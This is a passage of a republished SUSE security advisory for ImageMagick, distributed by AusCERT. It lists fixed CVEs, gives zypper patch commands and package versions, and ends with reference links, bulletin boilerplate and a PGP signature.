  o CVE-2020-27762: Fixed an outside the range of representable values of type
    'unsigned char' (bsc#1179278).
  o CVE-2020-27763: Fixed a division by zero at MagickCore/resize.c (bsc#
    1179312).
  o CVE-2020-27764: Fixed an outside the range of representable values of type
    'unsigned long' at MagickCore/statistic.c (bsc#1179317).
  o CVE-2020-27765: Fixed a division by zero at MagickCore/segment.c (bsc#
    1179311).
  o CVE-2020-27766: Fixed an outside the range of representable values of type
    'unsigned long' at MagickCore/statistic.c (bsc#1179361).
  o CVE-2020-27767: Fixed an outside the range of representable values of type
    'float' at MagickCore/quantum.h (bsc#1179322).
  o CVE-2020-27768: Fixed an outside the range of representable values of type
    'unsigned int' at MagickCore/quantum-private.h (bsc#1179339).
  o CVE-2020-27770: Fixed an unsigned offset overflowed at MagickCore/string.c
    (bsc#1179343).
  o CVE-2020-27771: Fixed an outside the range of representable values of type
    'unsigned char' at coders/pdf.c (bsc#1179327).
  o CVE-2020-27772: Fixed an outside the range of representable values of type
    'unsigned int' at coders/bmp.c (bsc#1179347).
  o CVE-2020-27773: Fixed a division by zero at MagickCore/gem-private.h (bsc#
    1179285).
  o CVE-2020-27774: Fixed an integer overflow at MagickCore/statistic.c (bsc#
    1179333).
  o CVE-2020-27775: Fixed an outside the range of representable values of type
    'unsigned char' at MagickCore/quantum.h (bsc#1179338).
  o CVE-2020-27776: Fixed an outside the range of representable values of type
    'unsigned long' at MagickCore/statistic.c (bsc#1179362).
  o CVE-2020-29599: Fixed a shell command injection in -authenticate (bsc#
    1179753).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

  o SUSE Linux Enterprise Module for Development Tools 15-SP2:
    zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP2-2021-153=1
  o SUSE Linux Enterprise Module for Desktop Applications 15-SP2:
    zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP2-2021-153=1

Package List:

  o SUSE Linux Enterprise Module for Development Tools 15-SP2 (aarch64 ppc64le
    s390x x86_64):
       ImageMagick-debuginfo-7.0.7.34-10.9.1
       ImageMagick-debugsource-7.0.7.34-10.9.1
       perl-PerlMagick-7.0.7.34-10.9.1
       perl-PerlMagick-debuginfo-7.0.7.34-10.9.1
  o SUSE Linux Enterprise Module for Desktop Applications 15-SP2 (aarch64
    ppc64le s390x x86_64):
       ImageMagick-7.0.7.34-10.9.1
       ImageMagick-config-7-SUSE-7.0.7.34-10.9.1
       ImageMagick-config-7-upstream-7.0.7.34-10.9.1
       ImageMagick-debuginfo-7.0.7.34-10.9.1
       ImageMagick-debugsource-7.0.7.34-10.9.1
       ImageMagick-devel-7.0.7.34-10.9.1
       libMagick++-7_Q16HDRI4-7.0.7.34-10.9.1
       libMagick++-7_Q16HDRI4-debuginfo-7.0.7.34-10.9.1
       libMagick++-devel-7.0.7.34-10.9.1
       libMagickCore-7_Q16HDRI6-7.0.7.34-10.9.1
       libMagickCore-7_Q16HDRI6-debuginfo-7.0.7.34-10.9.1
       libMagickWand-7_Q16HDRI6-7.0.7.34-10.9.1
       libMagickWand-7_Q16HDRI6-debuginfo-7.0.7.34-10.9.1


References:

  o https://www.suse.com/security/cve/CVE-2020-25664.html
  o https://www.suse.com/security/cve/CVE-2020-25665.html
  o https://www.suse.com/security/cve/CVE-2020-25666.html
  o https://www.suse.com/security/cve/CVE-2020-25674.html
  o https://www.suse.com/security/cve/CVE-2020-25675.html
  o https://www.suse.com/security/cve/CVE-2020-25676.html
  o https://www.suse.com/security/cve/CVE-2020-27750.html
  o https://www.suse.com/security/cve/CVE-2020-27751.html
  o https://www.suse.com/security/cve/CVE-2020-27752.html
  o https://www.suse.com/security/cve/CVE-2020-27753.html
  o https://www.suse.com/security/cve/CVE-2020-27754.html
  o https://www.suse.com/security/cve/CVE-2020-27755.html
  o https://www.suse.com/security/cve/CVE-2020-27756.html
  o https://www.suse.com/security/cve/CVE-2020-27757.html
  o https://www.suse.com/security/cve/CVE-2020-27758.html
  o https://www.suse.com/security/cve/CVE-2020-27759.html
  o https://www.suse.com/security/cve/CVE-2020-27760.html
  o https://www.suse.com/security/cve/CVE-2020-27761.html
  o https://www.suse.com/security/cve/CVE-2020-27762.html
  o https://www.suse.com/security/cve/CVE-2020-27763.html
  o https://www.suse.com/security/cve/CVE-2020-27764.html
  o https://www.suse.com/security/cve/CVE-2020-27765.html
  o https://www.suse.com/security/cve/CVE-2020-27766.html
  o https://www.suse.com/security/cve/CVE-2020-27767.html
  o https://www.suse.com/security/cve/CVE-2020-27768.html
  o https://www.suse.com/security/cve/CVE-2020-27769.html
  o https://www.suse.com/security/cve/CVE-2020-27770.html
  o https://www.suse.com/security/cve/CVE-2020-27771.html
  o https://www.suse.com/security/cve/CVE-2020-27772.html
  o https://www.suse.com/security/cve/CVE-2020-27773.html
  o https://www.suse.com/security/cve/CVE-2020-27774.html
  o https://www.suse.com/security/cve/CVE-2020-27775.html
  o https://www.suse.com/security/cve/CVE-2020-27776.html
  o https://www.suse.com/security/cve/CVE-2020-29599.html
  o https://bugzilla.suse.com/1179202
  o https://bugzilla.suse.com/1179208
  o https://bugzilla.suse.com/1179212
  o https://bugzilla.suse.com/1179221
  o https://bugzilla.suse.com/1179223
  o https://bugzilla.suse.com/1179240
  o https://bugzilla.suse.com/1179244
  o https://bugzilla.suse.com/1179260
  o https://bugzilla.suse.com/1179268
  o https://bugzilla.suse.com/1179269
  o https://bugzilla.suse.com/1179276
  o https://bugzilla.suse.com/1179278
  o https://bugzilla.suse.com/1179281
  o https://bugzilla.suse.com/1179285
  o https://bugzilla.suse.com/1179311
  o https://bugzilla.suse.com/1179312
  o https://bugzilla.suse.com/1179313
  o https://bugzilla.suse.com/1179315
  o https://bugzilla.suse.com/1179317
  o https://bugzilla.suse.com/1179321
  o https://bugzilla.suse.com/1179322
  o https://bugzilla.suse.com/1179327
  o https://bugzilla.suse.com/1179333
  o https://bugzilla.suse.com/1179336
  o https://bugzilla.suse.com/1179338
  o https://bugzilla.suse.com/1179339
  o https://bugzilla.suse.com/1179343
  o https://bugzilla.suse.com/1179345
  o https://bugzilla.suse.com/1179346
  o https://bugzilla.suse.com/1179347
  o https://bugzilla.suse.com/1179361
  o https://bugzilla.suse.com/1179362
  o https://bugzilla.suse.com/1179397
  o https://bugzilla.suse.com/1179753

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYATks+NLKJtyKPYoAQirHRAAqU/tzvHcI6BV4B9w/DIH/8Q0vOoLW46c
fGmuXIip32ehTSF/672OG2/EasVQT+1AMhrVTDZEsx4f5fKf5bSS+n27h2XRqjKg
IfG7i4OBMMKNR5rlwpJuIhHGP9Hqg37C0SMZNWjO+WZvm8BvX9xu4AaJ3W7Qr/5H
N9sP12JwHtt/ywKbLKprck81Jp12Uk8/doe2dBuFwymmyWw+EnFmOfRqzH2/0XqC
7MtuaMn6tfo1ZKvQKdLYHTnEyWT0c52hz6VXNxSmBXy8fLyl6obcernTuiDYjVSx
JXo7ZSs5aYKTim65Hbhy+BuHGbdhBegNtblTlDE21/OHHB+nQC3o+wWtY2SStMnG
b0dBhWsDP5tGYAkHkqT+uPhKOmxfukJiSA/01EPHC1BmweyQbtet01UkIrdanmVp
7Q2veOnwtpsUQJbhFKm0kstX7Cw7B+w4W0yXkskadUCdzt+BzP4nLrisUE1BpaQ/
Buz+QJuwPenvzbraAPNELchLORpga5d2ZhpgTCTCOiz8LQpcLXvVoGv+jeyoFUEz
+huVPaSw34Iv1CRtI+tZY7Pf9Hc+sZHRswOct7shILLv8z2G1a9Gp6N2pIE6lArN
FFkoj/5WT1hNNRCY6nDxBxl5ugKiaas98MREY4iqsvI8XaPykWP+wDvvGDHPLzma
ItylEwNtVf0=
=emS7
-----END PGP SIGNATURE-----

Read More

The post ESB-2021.0205 – [SUSE] ImageMagick: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/01/18/esb-2021-0205-suse-imagemagick-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-0205-suse-imagemagick-multiple-vulnerabilities